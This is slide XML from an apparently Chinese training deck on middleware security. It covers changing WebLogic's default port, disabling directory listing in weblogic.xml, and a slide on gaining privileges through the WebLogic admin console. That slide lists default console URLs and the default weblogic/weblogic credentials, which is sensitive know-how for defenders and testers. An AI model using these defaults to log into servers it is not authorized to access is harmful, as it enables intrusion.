              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&gt;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7005</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/listen-port&gt;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&lt;listen-address&gt;localhost&lt;/listen-address&gt;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&lt;data-source&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="8096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&lt;rmi-jdbc-security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xsi:nil="true"&gt;&lt;/rmi-jdbc-security&gt;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&lt;/data-source&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="8249284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&lt;/server&gt;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41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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>i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dirty="0"/>
              <a:t>的默认开放端口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52250"/>
            <a:ext cx="8205470" cy="81724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登录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进行修改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在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环境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--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服务器节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点中点击你要修改的服务器的端口的名称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如下图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AdminServer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8928" y="2269494"/>
            <a:ext cx="9534144" cy="440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/>
              <a:t>中间件的分类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6"/>
            <a:ext cx="1023688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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>面向消息中间件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2400"/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2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>    面向消息中间件的功能：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="1600"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="1600"/>
              <a:t>面向消息的中间件可以利用消息传递机制，进行不依赖于特定平台的数据交换。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0"/>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>常见提供的功能：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="177800" lvl="0"/>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>同步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异步通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="1600"/>
              <a:t>、提高系统容错性、持久储存消息、 支持集群。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-Hans" sz="160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03CF7CA0-5BFB-6A4F-BC13-BF4239F3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4648200"/>
            <a:ext cx="5894809" cy="2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2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690" y="459473"/>
            <a:ext cx="641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2DED1"/>
                </a:solidFill>
                <a:latin typeface="Droid Sans Fallback"/>
                <a:cs typeface="Droid Sans Fallback"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a: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b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>l</a:t>
            </a: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og</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Droid Sans Fallback"/>
                <a:cs typeface="Droid Sans Fallback"/>
              </a:rPr>
              <a:t>的默认开放端口</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Droid Sans Fallback"/>
              <a:cs typeface="Droid Sans Fallb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0192" y="1469999"/>
            <a:ext cx="39104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修改监听端口后点击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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保存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即可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0" y="1905000"/>
            <a:ext cx="9229344" cy="482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6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031" y="3811270"/>
            <a:ext cx="1268095" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1268095" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1267968" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126796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19810" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1019810" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1019556" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101955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956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禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>i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dirty="0"/>
              <a:t>列表显示文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019555" y="2272283"/>
            <a:ext cx="9904730" cy="2092960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="2092960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="2092452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="209245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4768" y="2267178"/>
            <a:ext cx="9914255" cy="2102485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9909390" y="2102408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2102408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2102180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2101494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2100440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2099119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2097646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092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2097646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2097646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="2099119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="2100440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="2101494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="2102180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2102408"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="210248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9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="990462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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9904628" y="2097646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2097646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9914153" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9524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4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9525" y="2097646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2097646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9904628" y="2097646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2097646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2097646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="2102485">
                <a:moveTo>
                  <a:pt x="9914153" y="2097646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="2097646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="2092883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="20976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851" y="1597723"/>
            <a:ext cx="10284460" cy="2673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修改域下的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weblogic.xml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配置文件，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修改如下内容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&lt;index-directory-enabled&gt;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true</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/index-directory-enabled&gt;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———&gt;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false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&lt;weblogic-web-app&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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&lt;container-descriptor&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="640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&lt;index-directory-enabled&gt;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false</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/index-directory-enabled&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6965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&lt;prefer-web-inf-classes&gt;true&lt;/prefer-web-inf-classes&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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&lt;/container-descriptor&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="470534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&lt;/weblogic-web-app&gt;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87683" y="3811270"/>
            <a:ext cx="1004569" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1004570" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1004316" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004316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283335" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1283335" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1283208" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128320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56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Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>后台获取权限的方法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283208" y="2648711"/>
            <a:ext cx="9904730" cy="585470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="585469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5852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039" y="2644648"/>
            <a:ext cx="9914255" cy="594360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9909390" y="594296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="594296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="594055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="593382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="592327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="589533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84771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="589533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913239" y="592327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912184" y="593382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="594055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="594296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="5943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594360">
                <a:moveTo>
                  <a:pt x="990462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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904628" y="589533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589533"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914153" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9525" y="589533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589533"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904628" y="589533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="589533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589533"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914153" y="589533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="58953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3208" y="3529584"/>
            <a:ext cx="9904730" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13228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8039" y="3524237"/>
            <a:ext cx="9914255" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9909390" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1329664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9914153" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1329664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913239" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912184" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255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333500">
                <a:moveTo>
                  <a:pt x="990462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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9904628" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9914153" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525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5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255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9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9904628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9904628" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9914153" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153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452250"/>
            <a:ext cx="10547985" cy="334454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默认端口是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7001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Weblogic10g-12c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默认的管理后台是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u="sng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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://localhost:7001/console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Weblogic10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以下默认后台地址是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http://192.168.80.1:7001/console/login/LoginForm.jsp</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="734060">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic10</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>以下默认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管理帐号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:weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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密码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weblogic</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="73406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例如：该设置存在与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的安装目录下的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/weblogic92/samples/domains/wl_server/config/config.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中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73406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关于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Weblogic10++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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>默认安装完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后需要建立一个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>域</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1191260" marR="14287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域环境下可以多</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>个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Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或者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群集。域是由单个管理服务器管理</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的 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Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
